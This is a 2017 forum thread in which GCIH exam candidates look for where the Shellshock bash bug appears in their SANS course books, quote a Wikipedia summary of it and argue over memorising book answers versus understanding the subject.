Shellshock/bash bug in GCIH books?

fabostrong · July 2017

Going over my practice test and trying to find everything in the books that I got wrong. I can't find Shellshock aka the bash bug anywhere in the books. Anyone know what section it's in or where it should be cause I can't find it anywhere?

Thanks

[Deleted User] · July 2017

Honestly, I haven't seen this in my GCIH books. Which edition of the manuals are you using? If you want to learn about ShellShock, just reference your CEH manuals. If you took CEHv9, it should be covered in there.

fabostrong · July 2017

kMastaFlash wrote: »

Honestly, I haven't seen this in my GCIH books. Which edition of the manuals are you using? If you want to learn about ShellShock, just reference your CEH manuals. If you took CEHv9, it should be covered in there.

Yeah but it was on my GCIH practice test. Not sure what edition they are as I don't have them in from of me but I took the class last month. Shell shock was on the practice.test and is nowhere to be found in the book.

xxxkaliboyxxx · July 2017

Just google it and read up on it. I think I got a question on Shellshock in the actual test.

fabostrong · July 2017

xxxkaliboyxxx wrote: »

Just google it and read up on it. I think I got a question on Shellshock in the actual test.

Yeah but one of the main things about GCIH or SANS courses is that the answers are supposed to be in the book.

stephens316 · July 2017

i don't think every answer is in the books some are taken from other CBK and put forth just general IT Security things. I comb your books though. then highlight it and put a tab on it. I will let you know what i find next month when i start the class.

TechGromit · July 2017

They claim all the answers are in the books, but I got a question about Win XP on one of my exams that wasn't in the books, I looked after the exam and couldn't find it anywhere. MOST of the answers are in the books, but there always seem to be a few that are not.

fabostrong · July 2017

Thanks guys.

BillHoo · August 2017

According to the index of my books current from 2016.

It was in Volume 4 (don't have the book handy, just my index), Pages 88 and 89. I think it was in a section regarding Applications or Web Applications Security, right after OWASP by a few pages.

Notes:
Shellshock - tricking web server into taking commands - shellshock. Commands i Linux/unix separated by a ;
Also - Used to insert commands directly instead of shell

If you are using the newer books, the pages could be off by as many as 20 -30 pages.

Googling brings up a wiki (looks a little different from my notes based on the SANS books)
https://en.wikipedia.org/wiki/Shellshock_(software_bug)

Shellshock, also known as Bashdoor,^[1] is a family of security bugs^[2] in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.^[3]
Stéphane Chazelas contacted Bash's maintainer, Chet Ramey, on 12 September 2014^[1] telling Ramey about his discovery of the original bug, which he called "Bashdoor". Working together with security experts, he soon had a patch as well.^[1] The bug was assigned the CVE identifier CVE-2014-6271.^[4] It was announced to the public on 24 September 2014 when Bash updates with the fix were ready for distribution.^[5]
The first bug causes Bash to unintentionally execute commands when the commands are concatenated to the end of function definitions stored in the values of environment variables.^[1]^[6] Within days of the publication of this, intense scrutiny of the underlying design flaws discovered a variety of related vulnerabilities, (CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, and CVE-2014-7187); which Ramey addressed with a series of further patches.^[7]^[8]
Attackers exploited Shellshock within hours of the initial disclosure by creating botnets of compromised computers to perform distributed denial-of-service attacks and vulnerability scanning.^[9]^[10] Security companies recorded millions of attacks and probes related to the bug in the days following the disclosure.^[11]^[12]
Shellshock could potentially compromise millions of unpatched servers and other systems. Accordingly, it has been compared to the Heartbleed bug in its severity.^[3]^[13]

BillHoo · August 2017

Try finding Portswigger in the books too! (It's in there!)

fabostrong · August 2017

BillHoo wrote: »

According to the index of my books current from 2016.

It was in Volume 4 (don't have the book handy, just my index), Pages 88 and 89. I think it was in a section regarding Applications or Web Applications Security, right after OWASP by a few pages.

You're the man. It's in the same book and on page 95. It's under Command Injection and a few pages after OWASP. It doesn't really explain it as well as I'd like but if I would've found it while taking the test, I think it would've given me enough information to get the right answer.

BillHoo · August 2017

I always reiterate the value of getting the SANS course to take the exam vs. challenging the exam.

I think shellshock is a good example. Search the internet and you might be able to find pages of information, or even enough to write a small booklet or article on the subject.

But when it comes to the exam, the test question would want to know a specific aspect of shellshock as explained in the book/class. Many times this is going to be maybe one sentence verbatim, or a defining concept. What is shellshock? It's a command injection where your use commands to trick the web server into taking commands. Pick the answer that's closest to the description.

xxxkaliboyxxx · August 2017

BillHoo wrote: »

I always reiterate the value of getting the SANS course to take the exam vs. challenging the exam.

I think shellshock is a good example. Search the internet and you might be able to find pages of information, or even enough to write a small booklet or article on the subject.

But when it comes to the exam, the test question would want to know a specific aspect of shellshock as explained in the book/class. Many times this is going to be maybe one sentence verbatim, or a defining concept. What is shellshock? It's a command injection where your use commands to trick the web server into taking commands. Pick the answer that's closest to the description.

I disagree respectfully. I believe what you are saying just reinforcing book answers and not knowing about the actual subject. If you know the underlying subject, studied the history, etc, you won't need to know exactly where in the book an answer is and if they change up the wording in the exam, no sweat because you understand the subject, versus just memorizing the book answer.

Shellshock/bash bug in GCIH books?

Comments